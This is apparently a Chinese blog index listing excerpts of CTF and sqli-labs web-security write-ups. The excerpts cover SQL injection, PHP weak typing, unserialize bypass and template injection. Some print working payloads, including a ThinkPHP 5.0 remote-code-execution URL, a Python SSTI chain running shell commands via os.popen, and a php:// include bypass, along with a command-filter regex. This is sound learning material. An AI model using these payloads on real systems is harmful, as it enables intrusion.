- 博客(16)
- 收藏
- 关注
RSS订阅原创 sqli-labs less1-10
less 1 字符型注入尝试?id=1添加单引号 ?id=1’报错 猜测id 有引号包括尝试永真永假确认有sql注入漏洞 搜索语句约为SELECT * FROM users WHERE id=’$id’ LIMIT 0,1用 order by 来判断几列 用–+注释掉后面的句子得知3列无返回 ,查看代码得知mysql_fetch_array()只返回搜索结果的一行将id 值为0 或负数 使得前面的搜索结果为空,使得后面的结果能显示查询数据库名
2021-05-16 17:32:33
97
原创 sqli-labs安装及遇到的问题
为了练习sql注入,安装sqli-labs,一个有点年头的练习网站环境:phpstudy 8.1.1下载sql:https://github.com/Audi-1/sqli-labs下载解压后放在www目录下打开sql-connections文件夹下db-creds.inc,修改其中账号和密码,改成phpstudy下自己的数据库账号名和密码。我这里使用了php 5.2.17版本 因为sqli-labs 好多年了 ,php 7中有几个函数不匹配,最方便的方法就是改成php5.2安装完发现,在le
2021-05-14 20:02:57
898
原创 (攻防sj)web-bug
打开如下,为登录界面任意用账户123 密码123注册完 登录进去发现进去管理模块需要管理员账户通过修改密码的功能 抓包将账户改成admin然后就可以登录管理员账户但是仍然无法进入管理页面,发ip验证错误可以使用X-Forwarded-For请求头,而管理员一班本地登录使用X-Forwarded-For:127.0.0.1发现提示<!-- index.php?module=filemanage&do=???-->这里上网查找得知,根据 filema.
2021-01-10 02:24:35
110
原创 (攻防sj)web-lottery
点开发现是个彩票游戏网站根据游戏规则 ,根据输入的字符串,和获奖号码比较相同的号码的数量,相同越多,奖金越多最后用奖金买flag附件里给了源码,读码发现关键部分如下而 == 为弱类型比较我们利用当其中一个为布尔值true时,另一个也会转换为布尔值true ,除非是0因此利用burp修改number值为7个true得到重复几次后就可以购买flag成功!关于php弱类型比较时不同数值类型的转换:https://www.php.cn/php-weizijiaoche.
2021-01-09 23:22:09
110
1
原创 (攻防sj)web -favorite_number
打开如下得到源码 <?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python|php|p.
2021-01-09 22:11:30
159
原创 (攻防sj)web-easytornado
三个文件 依次查看得知,flag所在url由 filename和filehash组成file为 /fllllllllllllag哈希值为 cookie密钥 + 文件名 md5加密获得且发现,若哈希值与文件名不符,进入第四个页面,错误页面并发现此页面存在模板注入render为Python的渲染函数,且有关于于cookie_secret密钥存放于application.settings 中模板注入,发现无法进入但是由于render() 允许 别名参考torna.
2020-12-30 11:18:11
91
原创 (攻防sj)web Web_php_unserialize
打开如下依然是需要利用 unserialize()和wakeup()传参时的漏洞,即,当传输的序列码中属性值的大小大于真实属性的数量时,会跳过wakeup()。上个问题已经了解了见链接:(https://blog.csdn.net/weixin_45344309/article/details/111385926)源码注释提示flag在 fl4g.php,可以传输fl4g.php但是他对传输的序列码作为正则表达式进行了过滤 if (preg_match('/[oc]:\d+:/i', $var.
2020-12-18 22:14:04
136
1
原创 (攻防sj)web unserialize3
打开如图注意到题目 反序列化函数 unserialize 和 代码内初始化函数 wakeup()如果一个类定义了__wakup()和__destruct(),则该类的实例被反序列化时,会自动调用__wakeup(), 生命周期结束时,则调用__desturct()。而,这两个函数存在漏洞,运行如下其中O:4:"xctf":1:{s:4:"flag";s:3:"111";}xctf后面的 1 代表此对象中存在 1 个属性 ,若将其,修改,使得大于其真实属性数量,则跳过此函数。若输入正确序.
2020-12-18 19:38:26
140
1
原创 (攻防sj)web -web2
打开如图这是加密代码,逆向解密即可substr 查找 ord 转ASCII码 chr ASCII转回来str_rot13 字母序列向后推13位,再次调用变回原来strrev 倒序输出 base64_encode base加密解密代码如下 <?php$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $q=base64_decode(strrev(str_rot13($miwen)).
2020-12-18 16:30:48
169
1
原创 (攻防sj) web NaNNaNNaNNaN-Batman
下载附件打开如下查看源码函数为乱码打开记事本,将 最后的执行函数eval 改为弹窗alert得到源码整理如下function $(){var e=document.getElementById("c").value;if(e.length==16)if(e.match(/^be0f23/)!=null)if(e.match(/233ac/)!=null)if(e.match(/e98aa$/)!=null)if(e.match(/c7be9/)!=null){var t.
2020-12-16 19:09:51
206
原创 (攻防sj)web PHP2
进入 如图扫描得到点开 index.phps即<?phpif("admin"===$_GET[id]) {echo("<p>not allowed!</p>");exit();}$_GET[id] = urldecode($_GET[id]);if($_GET[id] == "admin"){echo "<p>Access granted!</p>";echo "<p>Key: xxxxxxx </p.
2020-12-16 09:56:47
96
原创 (攻防sj)web php_rce
打开如图此框架旧版本存在严重漏洞前往github搜索漏洞选取5.0版本显示版本为5.0.20选取5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id前面的 http://localhost/thinkphp_5.0.21 为靶场地址,不用用ls查看目录没有flag,向上级目录依次找找到fl.
2020-12-16 08:41:56
73
原创 (攻防sj)Web_php_include
网页打开如下strstr函数:查找字符串首次出现位置,返回字符串剩余部分str_replace:将字符串替代为另一字符串,但是区分大小写即查找“php://”首次出现将其替代为空,即拦截了/?page=php:// 这种传输一、post请求将php 换为PHP 或Php 都可以绕过筛选<?phpsystem("ls")?><?phpsystem("cat fl4gisisish3r3.php")?>找到flag二、data伪协议传输虽然过滤ph
2020-12-09 13:01:03
130
1
原创 (攻防sj)web-upload1
打开如下想到上传木马查看源码只能上传jpg和png文件将木马后缀改为jpg再用burp 修改后缀为php 发送用蚁剑链接,找到flag文件
2020-12-09 09:53:29
57
原创 (攻防sj)Web_python_template_injection(模板注入)
打开如图提示Python模板注入输入{{1+1}}验证确实存在模板注入调用os模块的popen执行ls打印所有文件{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}找到flag ,把它读出来{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl
2020-12-07 09:37:28
120
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人